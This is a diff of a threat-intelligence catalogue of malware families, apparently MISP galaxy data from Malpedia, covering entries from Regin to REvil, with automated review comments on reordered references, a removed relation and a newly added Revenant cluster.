+ "https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0cf21558-1217-4d36-9536-2919cfd44825",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
"value": "Regin"
},
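Review bot: Same concern as for reGeorg: the Regin entry loses its "related" block pointing at dest-uuid 0cf21558-1217-4d36-9536-2919cfd44825 (type "similar"), while the rest of the hunk is only a reorder of the existing refs. Two silent relation removals in adjacent entries suggest a systematic change in how "related" is generated rather than a per-entry curation decision; please confirm which it is, and if relations are meant to stay, restore them.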
@@ -38863,9 +40913,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker",
+ "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/",
"https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/",
- "https://twitter.com/malwrhunterteam/status/1321375502179905536",
- "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/"
+ "https://twitter.com/malwrhunterteam/status/1321375502179905536"
],
"synonyms": [],
"type": []
@@ -38963,79 +41013,89 @@
"value": "RemCom"
},
{
- "description": "Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user. \r\nRemcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns. ",
+ "description": "Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.\r\n\r\nRemcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user.\r\nRemcos is developed by the cybersecurity company BreakingSecurity.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
- "https://www.connectwise.com/resources/formbook-remcos-rat",
- "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://secrary.com/ReversingMalware/RemcosRAT/",
- "https://www.youtube.com/watch?v=DIH4SvKuktM",
- "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
- "https://perception-point.io/behind-the-attack-remcos-rat/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
- "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
"https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
- "https://www.telsy.com/download/4832/",
- "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
- "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
- "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
- "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
- "https://asec.ahnlab.com/en/32376/",
- "https://muha2xmad.github.io/unpacking/remcos/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
- "https://www.esentire.com/blog/remcos-rat",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://intel471.com/blog/privateloader-malware",
- "https://asec.ahnlab.com/ko/32101/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
- "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
- "http://malware-traffic-analysis.net/2017/12/22/index.html",
- "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
- "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87",
- "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
- "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.morphisec.com/nft-malware-new-evasion-abilities",
+ "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://muha2xmad.github.io/unpacking/remcos/",
"https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://dissectingmalwa.re/malicious-ratatouille.html",
- "https://asec.ahnlab.com/ko/25837/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://www.esentire.com/blog/remcos-rat",
+ "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
+ "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
+ "https://secrary.com/ReversingMalware/RemcosRAT/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
"https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD",
- "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
- "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
+ "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
"https://muha2xmad.github.io/mal-document/remcosdoc/",
+ "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://asec.ahnlab.com/en/32376/",
+ "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://www.telsy.com/download/4832/",
+ "https://www.connectwise.com/resources/formbook-remcos-rat",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://dissectingmalwa.re/malicious-ratatouille.html",
+ "https://asec.ahnlab.com/ko/32101/",
+ "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
+ "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
+ "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://perception-point.io/behind-the-attack-remcos-rat/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
+ "https://www.youtube.com/watch?v=DIH4SvKuktM",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md"
+ "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
+ "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
+ "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87",
+ "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/"
],
"synonyms": [
"RemcosRAT",
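Review bot: The wholesale reorder of the Remcos refs hides that this hunk actually adds ten new references with no matching removed line (among them the Microsoft tax-day post, the Spamhaus 2022 Q3 and 2023 Q1 botnet updates, the Check Point March 2023 and TrickGate posts, the Trellix Ukraine story, the Malwarebytes threat-intel PDF and the Zscaler DBatLoader post); with a stable sort order those would show up as plain "+" lines. The description rewrite is a straightforward wording update (now "commercial Remote Access Tool", attributed to BreakingSecurity, with the stray trailing space removed) and looks correct; note that it keeps the "\r\n" line endings used by the other descriptions, so formatting stays consistent.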
@@ -39052,14 +41112,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
- "https://twitter.com/QW5kcmV3/status/1095833216605401088",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
- "https://securelist.com/chafer-used-remexi-malware/89538/",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
"https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://securelist.com/chafer-used-remexi-malware/89538/",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
+ "https://twitter.com/QW5kcmV3/status/1095833216605401088",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf"
],
"synonyms": [
"CACHEMONEY"
@@ -39102,11 +41162,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
"https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
"https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html",
- "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html"
],
"synonyms": [],
"type": []
@@ -39119,8 +41179,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
- "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
],
"synonyms": [
"WINDSHIELD"
@@ -39148,8 +41208,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/",
- "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/"
+ "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
],
"synonyms": [],
"type": []
@@ -39162,14 +41222,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
- "https://github.com/Tomasuh/retefe-unpacker",
- "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
- "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
- "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
- "https://www.govcert.admin.ch/blog/35/reversing-retefe",
"https://github.com/cocaman/retefe",
+ "https://github.com/Tomasuh/retefe-unpacker",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe"
+ "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
+ "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
+ "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
+ "https://www.govcert.admin.ch/blog/35/reversing-retefe"
],
"synonyms": [
"Tsukuba",
@@ -39185,10 +41245,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retro",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
"https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/",
- "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/"
],
"synonyms": [],
"type": []
@@ -39196,32 +41256,45 @@
"uuid": "a4dc538e-09b7-4dba-99b0-e8b8b70dd42a",
"value": "Retro"
},
+ {
+ "description": "According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant",
+ "https://github.com/0xTriboulet/Revenant"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c95db5a7-8405-4931-868f-1a33ea7e8f6b",
+ "value": "Revenant"
+ },
{
"description": "According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
- "https://isc.sans.edu/diary/rss/22590",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://securelist.com/revengehotels/95229/",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
"https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
- "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://isc.sans.edu/diary/rss/22590",
"https://blogs.360.cn/post/APT-C-44.html",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
"https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
"https://blog.reversinglabs.com/blog/dotnet-loaders",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html"
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://securelist.com/revengehotels/95229/",
+ "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/"
],
"synonyms": [
"Revetrat"
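Review bot: The new Revenant cluster is introduced with uuid c95db5a7-8405-4931-868f-1a33ea7e8f6b; since MISP keys clusters on this uuid, please confirm it was freshly generated, is unique within the galaxy, and will be reused verbatim on the next regeneration rather than re-randomized, otherwise consumers will see a duplicate cluster. The entry follows the existing shape (description prefixed "According to its author", Malpedia plus GitHub refs, empty "synonyms" and "type"), which is consistent with neighbouring entries. The remaining lines of the hunk are a reorder of the Revenge RAT refs with no additions.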
@@ -39236,11 +41309,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/",
- "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
- "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388"
],
"synonyms": [],
"type": []
@@ -39266,283 +41340,286 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.revil",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
- "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf",
- "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40",
- "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/",
- "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
- "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.youtube.com/watch?v=P8o6GItci5w",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/",
- "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
- "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident",
- "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2",
- "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
- "https://www.certego.net/en/news/malware-tales-sodinokibi/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/",
- "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
- "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit",
- "https://securelist.com/sodin-ransomware/91473/",
- "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
- "https://twitter.com/resecurity_com/status/1412662343796813827",
